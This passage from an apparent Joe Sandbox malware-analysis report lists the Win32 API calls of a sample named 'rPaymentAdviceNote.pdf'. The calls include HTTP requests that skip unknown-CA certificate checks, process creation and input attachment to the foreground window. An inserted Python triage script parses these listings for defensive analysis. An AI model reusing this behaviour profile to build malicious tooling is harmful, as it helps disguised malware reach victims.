                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: 3553d3a8e55ce366cfd0b67f2307fb747cf0eb0157adbd1f44a32d87c47b8e0b
                                                              • Instruction ID: 2da9263fbb6228f1ddea6d5fffb6e8201b331238fdf2b3612775835e40f465b4
                                                              • Opcode Fuzzy Hash: 3553d3a8e55ce366cfd0b67f2307fb747cf0eb0157adbd1f44a32d87c47b8e0b
                                                              • Instruction Fuzzy Hash: BB113D3A34830BB5FE10377CDC06DB73B9CFB10320B24006AFA20E44D2FEA658115550
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 008B88D7
                                                              • CoInitialize.OLE32(00000000), ref: 008B8904
                                                              • CoUninitialize.OLE32 ref: 008B890E
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 008B8A0E
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 008B8B3B
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,008D2C0C), ref: 008B8B6F
                                                              • CoGetObject.OLE32(?,00000000,008D2C0C,?), ref: 008B8B92
                                                              • SetErrorMode.KERNEL32(00000000), ref: 008B8BA5
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008B8C25
                                                              • VariantClear.OLEAUT32(?), ref: 008B8C35
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: 8a8072392dfd7462ee2fc084bdb6c134883e500a6a918d4a113f3bfb5ad19cf8
                                                              • Instruction ID: 3e881c7db9d3c348c79573a21d351f259af77d32f2e6b32aa1692b56b86875b7
                                                              • Opcode Fuzzy Hash: 8a8072392dfd7462ee2fc084bdb6c134883e500a6a918d4a113f3bfb5ad19cf8
                                                              • Instruction Fuzzy Hash: EAC1E1B1608205EFD700DF68C88496ABBE9FB89758F00492DF589DB261DB71ED05CB52
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 008A7A6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 80569a18da363ff111b243feb80fb957483f07cde70ed7b1b2fc7326a927457b
                                                              • Instruction ID: b87b0857b96d49ce007c7949c6a406d4927e6cba24f9afe65ff543bc09921924
                                                              • Opcode Fuzzy Hash: 80569a18da363ff111b243feb80fb957483f07cde70ed7b1b2fc7326a927457b
                                                              • Instruction Fuzzy Hash: 74B19F7190421A9FEB10DFA8CC84BBEB7B5FF0A325F244429E641E7641D734A941EBA1
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 008A11F0
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A1204
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 008A120B
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008A0268,?,00000001), ref: 008A121A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008A122C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008A0268,?,00000001), ref: 008A1245
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008A0268,?,00000001), ref: 008A1257
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A129C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A12B1
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A12BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: b0c9cb75482bd3b288c62ebe664610dfcda2d67caaa56d6674019370f99b6379
                                                              • Instruction ID: a9b61c57bed77438993c14937ce25db0e2b1abc824c7ded9651be8da1b32f391
                                                              • Opcode Fuzzy Hash: b0c9cb75482bd3b288c62ebe664610dfcda2d67caaa56d6674019370f99b6379
                                                              • Instruction Fuzzy Hash: 1931A975618204AFFF20DF54EC88F6977AAFB66351F104125FA01C76A1D7B4DD409B60
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0084FAA6
                                                              • OleUninitialize.OLE32(?,00000000), ref: 0084FB45
                                                              • UnregisterHotKey.USER32(?), ref: 0084FC9C
                                                              • DestroyWindow.USER32(?), ref: 008845D6
                                                              • FreeLibrary.KERNEL32(?), ref: 0088463B
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00884668
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: bb6e497852c5bc52b473f895236a58244f94e1b63af271475891f9ef89c65e9d
                                                              • Instruction ID: 8c4267bd2f2961ec568ef8a130687830153884c88fb1dc55d51266704fca678f
                                                              • Opcode Fuzzy Hash: bb6e497852c5bc52b473f895236a58244f94e1b63af271475891f9ef89c65e9d
                                                              • Instruction Fuzzy Hash: A1A19E3130122ACFDB29EF18C994A29F761FF15714F1442ADE90AEB262DB30AC16CF51
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0089A439), ref: 0089A377
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: b220d1cb7cc111b0677288a3836d7311bf7af841d9380e06a2108f038414c35d
                                                              • Instruction ID: c94bfa9cacb22729b8d40cc96fd86dc1a655cfe56587d00abf662cfd13ec9296
                                                              • Opcode Fuzzy Hash: b220d1cb7cc111b0677288a3836d7311bf7af841d9380e06a2108f038414c35d
                                                              • Instruction Fuzzy Hash: 4E91703060060AAADF0CEFA4C446BEEFB75FF04304F588119E95AE7251DB316999DBD2
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00842EAE
                                                                • Part of subcall function 00841DB3: GetClientRect.USER32(?,?), ref: 00841DDC
                                                                • Part of subcall function 00841DB3: GetWindowRect.USER32(?,?), ref: 00841E1D
                                                                • Part of subcall function 00841DB3: ScreenToClient.USER32(?,?), ref: 00841E45
                                                              • GetDC.USER32 ref: 0087CD32
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0087CD45
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0087CD53
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0087CD68
                                                              • ReleaseDC.USER32(?,00000000), ref: 0087CD70
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0087CDFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 86654effc4a114abd18c53308d7afb4a8ba0d3b2dc6cf500847a71db4081af53
                                                              • Instruction ID: 00c8db0cbb7b4730b5edaf5ddb467c01f1074b7a6d40918b8aa340f056ae68bd
                                                              • Opcode Fuzzy Hash: 86654effc4a114abd18c53308d7afb4a8ba0d3b2dc6cf500847a71db4081af53
                                                              • Instruction Fuzzy Hash: 61718E31504209DFCF218F64C884AAA7FB5FF48324F14826AFD59DB2AAD731C881DB60
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008B1A50
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008B1A7C
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 008B1ABE
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008B1AD3
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B1AE0
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008B1B10
                                                              • InternetCloseHandle.WININET(00000000), ref: 008B1B57
                                                                • Part of subcall function 008B2483: GetLastError.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B2498
                                                                • Part of subcall function 008B2483: SetEvent.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 2603140658-3916222277
                                                              • Opcode ID: 9c5b82915a38610336b8007ea10dea2d936df3993a50372c71d59e0ef2ea3bcf
                                                              • Instruction ID: 93becb24150410d38461b6cd0e0e898f7822778cf46dbc1bd15abecdc1b17940
                                                              • Opcode Fuzzy Hash: 9c5b82915a38610336b8007ea10dea2d936df3993a50372c71d59e0ef2ea3bcf
                                                              • Instruction Fuzzy Hash: F0414CB1501219BFEF119F54CC99FFA7BADFB08354F00412AFA05DA241E770AE449BA5
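The function blocks in this part of the report are raw IDA-plugin output: one API list, one memory-dump source and one set of hashes per function, with Win32 constants left as hex. The Python script below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it parses blocks in this format into structured records, decodes the WinINet constants that matter for this block (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100, HTTP_QUERY_CONTENT_LENGTH = 5, all from wininet.h) and tags each function with a coarse behaviour label. The two sample blocks embedded in it are copied from this report (the WinINet block above and the CreateProcessW block further down, with the dump lines trimmed). The behaviour-tag table is the example's own choice, and reading the third InternetSetOptionW argument (rendered by the report as 00000100) as the DWORD flag value rather than as the buffer pointer is an assumption about how Joe Sandbox resolves that argument.

```python
"""Triage helper for Joe Sandbox 'IDA Plugin' function blocks.

Added example, not part of the Joe Sandbox report: parses the per-function API
listings into records, decodes a few WinINet/HTTP constants and tags behaviour.
"""
import re
from collections import OrderedDict

# Constructed sample: two blocks copied from this report (WinINet block and the
# CreateProcessW block), with the associated-dump lines left out.
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008B1A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008B1A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 008B1ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008B1AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B1AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008B1B10
• InternetCloseHandle.WININET(00000000), ref: 008B1B57
  • Part of subcall function 008B2483: GetLastError.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B2498
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: 9c5b82915a38610336b8007ea10dea2d936df3993a50372c71d59e0ef2ea3bcf
APIs
• _memset.LIBCMT ref: 008BF6B5
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008BFA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008BFA7C
• CloseHandle.KERNEL32(?), ref: 008BFAAB
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 108874b76b75f37d544f8c1464cc27fbd6b05d0635afea9cafbda0ae8fe6eab9
"""

# '• Api.MODULE(args), ref: addr' or '• Api.MODULE ref: addr', optionally
# prefixed by 'Part of subcall function XXXX: ' for inlined callee references.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Constants from wininet.h; '?' arguments in the report are unresolved values.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {
    0x80: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}

# Example's own tag table: a block gets a tag when it calls every API in the set.
BEHAVIOUR_TAGS = OrderedDict([
    ("http-client", {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"}),
    ("process-creation", {"CreateProcessW"}),
    ("foreground-input-attach", {"AttachThreadInput", "GetForegroundWindow"}),
    ("com-moniker-resolution", {"CoGetObject", "CoGetInstanceFromFile"}),
])


def parse_api_line(line):
    """Parse one API line into a dict, or return None for any other line."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": m.group("ref"), "subcall": m.group("sub")}


def parse_blocks(text):
    """Split report text into function blocks; each starts at an 'APIs' line."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "opcode_id": None, "source": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        call = parse_api_line(line)
        if call:
            cur["apis"].append(call)
        elif line.startswith("• Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("• Source File:"):
            cur["source"] = line.split(":", 1)[1].strip()
    return blocks


def _hexarg(args, i):
    """args[i] as an int, or None when missing or unresolved ('?')."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def decode_constants(call):
    """Name the WinINet option / security-flag / query-info constants in a call."""
    notes, api, args = [], call["api"], call["args"]
    if api in ("InternetSetOptionW", "InternetQueryOptionW") \
            and _hexarg(args, 1) == INTERNET_OPTION_SECURITY_FLAGS:
        notes.append("INTERNET_OPTION_SECURITY_FLAGS")
        if api == "InternetSetOptionW":
            # Assumption: the report renders the flag DWORD in the buffer slot.
            flags = _hexarg(args, 2) or 0
            notes += [name for bit, name in SECURITY_FLAGS.items() if flags & bit]
    if api == "HttpQueryInfoW":
        notes.append(HTTP_QUERY.get(_hexarg(args, 1), "HTTP_QUERY_<unknown>"))
    return notes


def tag_block(block):
    """Behaviour tags whose required APIs are all called directly by the block."""
    names = {c["api"] for c in block["apis"] if not c["subcall"]}
    return [tag for tag, needed in BEHAVIOUR_TAGS.items() if needed <= names]


def summarize(text):
    """One row per function block: short opcode id, modules, tags, decoded notes."""
    rows = []
    for block in parse_blocks(text):
        notes = []
        for call in block["apis"]:
            for n in decode_constants(call):
                notes.append(f"{call['api']}@{call['ref']}: {n}")
        rows.append({"opcode_id": (block["opcode_id"] or "")[:12],
                     "modules": sorted({c["module"] for c in block["apis"]}),
                     "tags": tag_block(block), "notes": notes})
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["opcode_id"], row["tags"], ", ".join(row["modules"]))
        for note in row["notes"]:
            print("   ", note)
```

Run against the two sample blocks, the WinINet function is tagged `http-client` with the security-flags set/query decoded (the set call adds SECURITY_FLAG_IGNORE_UNKNOWN_CA, so a certificate from an unknown CA would not abort the request) and the second function is tagged `process-creation`. Pasting further blocks from this report into `SAMPLE`, or feeding the report text through `summarize`, extends the same pass to the rest of the listing.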
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,008CF910), ref: 008B8D28
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,008CF910), ref: 008B8D5C
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008B8ED6
                                                              • SysFreeString.OLEAUT32(?), ref: 008B8F00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: e7adf88b027981b552db6c9b5ca01417bf50ec8e21b377a91492656acf02bff4
                                                              • Instruction ID: 510ddd0a882418b066fa3db011ad0612e786a61ec3e4483e769c0eb1234b3a6b
                                                              • Opcode Fuzzy Hash: e7adf88b027981b552db6c9b5ca01417bf50ec8e21b377a91492656acf02bff4
                                                              • Instruction Fuzzy Hash: 27F1F471A00119EFDB14EF94C884EEEB7B9FF45314F148498E905EB251DB31AE46CB61
                                                              APIs
                                                              • _memset.LIBCMT ref: 008BF6B5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008BF848
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008BF86C
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008BF8AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008BF8CE
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008BFA4A
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008BFA7C
                                                              • CloseHandle.KERNEL32(?), ref: 008BFAAB
                                                              • CloseHandle.KERNEL32(?), ref: 008BFB22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: 108874b76b75f37d544f8c1464cc27fbd6b05d0635afea9cafbda0ae8fe6eab9
                                                              • Instruction ID: 52d2ddbf6a9e2ba37b0f597d2b4e8fef71dc2a6a1569c7c6233e4af584d03226
                                                              • Opcode Fuzzy Hash: 108874b76b75f37d544f8c1464cc27fbd6b05d0635afea9cafbda0ae8fe6eab9
                                                              • Instruction Fuzzy Hash: 7EE17D316042509FD724EF28C881AAABBE1FF85314F14896DF999DB3A2DB31DC45CB52
                                                              APIs
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008A3697,?), ref: 008A468B
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008A3697,?), ref: 008A46A4
                                                                • Part of subcall function 008A4A31: GetFileAttributesW.KERNEL32(?,008A370B), ref: 008A4A32
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 008A4D40
                                                              • _wcscmp.LIBCMT ref: 008A4D5A
                                                              • MoveFileW.KERNEL32(?,?), ref: 008A4D75
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: de645e977e6dc2d9f009877f0069b43a143e8c500a11ae3a79ad3eb074b19df1
                                                              • Instruction ID: 1c18e639db805e478952a47bf313fb61eef00222aa575d6060a761e8f22fa46f
                                                              • Opcode Fuzzy Hash: de645e977e6dc2d9f009877f0069b43a143e8c500a11ae3a79ad3eb074b19df1
                                                              • Instruction Fuzzy Hash: D15151B24083459BDB24DB64D8819DFB7ECFF85310F00192EB689D3552EF74A588C766
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008C86FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 9cc11070ab96ad0117242ecab9f81884242b7b35d93909ef2f6237dc1cca49a9
                                                              • Instruction ID: a9ea4d6cd8c33c6bfb5d5b6624528dcf900c7876c6617adb4a7dc086028808ab
                                                              • Opcode Fuzzy Hash: 9cc11070ab96ad0117242ecab9f81884242b7b35d93909ef2f6237dc1cca49a9
                                                              • Instruction Fuzzy Hash: 3151A330580258FEEF209B28DC89FAD7BB5FB15314F604129FA11E66A1DF71E980DB51
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0087C2F7
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0087C319
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0087C331
